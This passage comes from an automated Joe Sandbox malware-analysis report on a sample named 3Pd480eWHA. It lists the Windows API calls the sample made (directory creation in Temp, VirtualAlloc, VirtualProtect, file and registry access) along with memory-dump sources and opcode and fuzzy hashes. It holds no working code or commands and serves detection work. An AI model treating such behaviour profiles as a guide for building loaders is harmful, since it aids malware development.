                                                                                              • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                              • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                              • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                              APIs
                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,004030DF,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032DC), ref: 0040546E
                                                                                              • GetLastError.KERNEL32 ref: 0040547C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1375471231-0
                                                                                              • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                              • Instruction ID: c55d8aa437131a95a01de78b0052dcd3d9cc3f447ee629d771dafcce0f52932c
                                                                                              • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                              • Instruction Fuzzy Hash: F5C04C30719601EAD6205B609E08B5B7D54AB54742F1045756546E10F0D6749451D92E
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNELBASE(00000000), ref: 100028A7
                                                                                              • GetLastError.KERNEL32 ref: 100029AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1834191377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1834168923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834213458.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834234460.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocErrorLastVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 497505419-0
                                                                                              • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                              • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                                              • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                              • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: wsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2111968516-0
                                                                                              • Opcode ID: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
                                                                                              • Instruction ID: 2ad6ade0dd87bb00519d913a8aa863536615c58d60cd2f1651ee4e1b5922b607
                                                                                              • Opcode Fuzzy Hash: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
                                                                                              • Instruction Fuzzy Hash: D321DB70C04295BEDF318B584A985AF7B749B11314F1484BBE891B62D1C1BD8A85EB1D
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630
                                                                                                • Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointerwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 327478801-0
                                                                                              • Opcode ID: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
                                                                                              • Instruction ID: 8aac78d75a064c4630454a8a93e19dff4664e4603579630d9101515f905a40da
                                                                                              • Opcode Fuzzy Hash: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
                                                                                              • Instruction Fuzzy Hash: 56E01A76A05640AAE701B7A5AE89CBE636ADB50318B20853BF601B00C1C6BD89059A3E
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
                                                                                              • Instruction ID: f02d1f32d416435064830634415e16150983832f9e15cf27d1a8645227483e3a
                                                                                              • Opcode Fuzzy Hash: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
                                                                                              • Instruction Fuzzy Hash: 6EE0E676250108BFD700DFA9DD47FD577ECE758745F008421B609D7095C774E5508B69
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403057,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,00000004,00000000), ref: 00405A3A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                              • Instruction ID: 202e9d0092b88ed1e300126467a6d0629c49e9ab1c26cc5f9aac99f6baf52130
                                                                                              • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                              • Instruction Fuzzy Hash: FFE0EC3261425AAFDF10AEA59C44EEB7B6CFB05360F008533F915E2550D231E921DFA9
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030A1,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                              • Instruction ID: ec62d6923e01247a1983afaeae7cc56c043784b3a51a97a909eefe23b1c45cc9
                                                                                              • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                              • Instruction Fuzzy Hash: CFE04F32210259AFCF10AE549C40EAB375CEB04250F004432F915E2040D230E8119FA8
                                                                                              APIs
                                                                                              • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1834191377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1834168923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834213458.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834234460.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                              • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                                              • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                              • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                                              APIs
                                                                                              • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString
                                                                                              • String ID:
                                                                                              • API String ID: 1096422788-0
                                                                                              • Opcode ID: 89032baceb3f6f114b0488ce247a90a0ba58f85f764d13967e355b5ac32f42df
                                                                                              • Instruction ID: 39f1f9859769fa242ff58571ca275c021542d1dfaf63d46caa25723865460d27
                                                                                              • Opcode Fuzzy Hash: 89032baceb3f6f114b0488ce247a90a0ba58f85f764d13967e355b5ac32f42df
                                                                                              • Instruction Fuzzy Hash: 66E08630A04214BFDB20EFA08D09BAE3669BF11714F10403AF9917B0D2EAB849419B1D
                                                                                              APIs
                                                                                              • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 0ea397a8211670639f436dd097bf0c7cb6117b14819b8f8d67c2300def58ed07
                                                                                              • Instruction ID: 839d6edb89fd0a39869f3bdff0d3b393134e6f043e5016f1e00bd5f534211bce
                                                                                              • Opcode Fuzzy Hash: 0ea397a8211670639f436dd097bf0c7cb6117b14819b8f8d67c2300def58ed07
                                                                                              • Instruction Fuzzy Hash: 34D05B33B14110DBDB40EBE4DB08A9D73A5BB60329B308637D201F21D1D7BDC9549B29
                                                                                              APIs
                                                                                              • SendMessageA.USER32(00010418,00000000,00000000,00000000), ref: 00403F4F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: fe9c5fbe97cae241cde84ce22785a5e9dbc0b02d0b9d793388d9d8a90b417260
                                                                                              • Instruction ID: 9b9c13dac3056517ae90cab9ba0900707a7cdbddb9b58ac83e38e750941f619c
                                                                                              • Opcode Fuzzy Hash: fe9c5fbe97cae241cde84ce22785a5e9dbc0b02d0b9d793388d9d8a90b417260
                                                                                              • Instruction Fuzzy Hash: 39C04C71A442016AEB219B649D49F067BA8A751701F1594257315A50E0D674E410D66D
                                                                                              APIs
                                                                                              • SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: c60a5741adf6fd17905679b15365177ec5dfd851c523a537735145c0d793b3ca
                                                                                              • Instruction ID: bce073d95cda9f80ae5a70f3258e8641f0ad27ed80faf677ac8523eeabb20274
                                                                                              • Opcode Fuzzy Hash: c60a5741adf6fd17905679b15365177ec5dfd851c523a537735145c0d793b3ca
                                                                                              • Instruction Fuzzy Hash: F7B09235585200AAEA224B40DD09F457A62A7A4701F008064B210240F0CAB200A0DB19
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,000089E4), ref: 004030B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                              • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                              • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
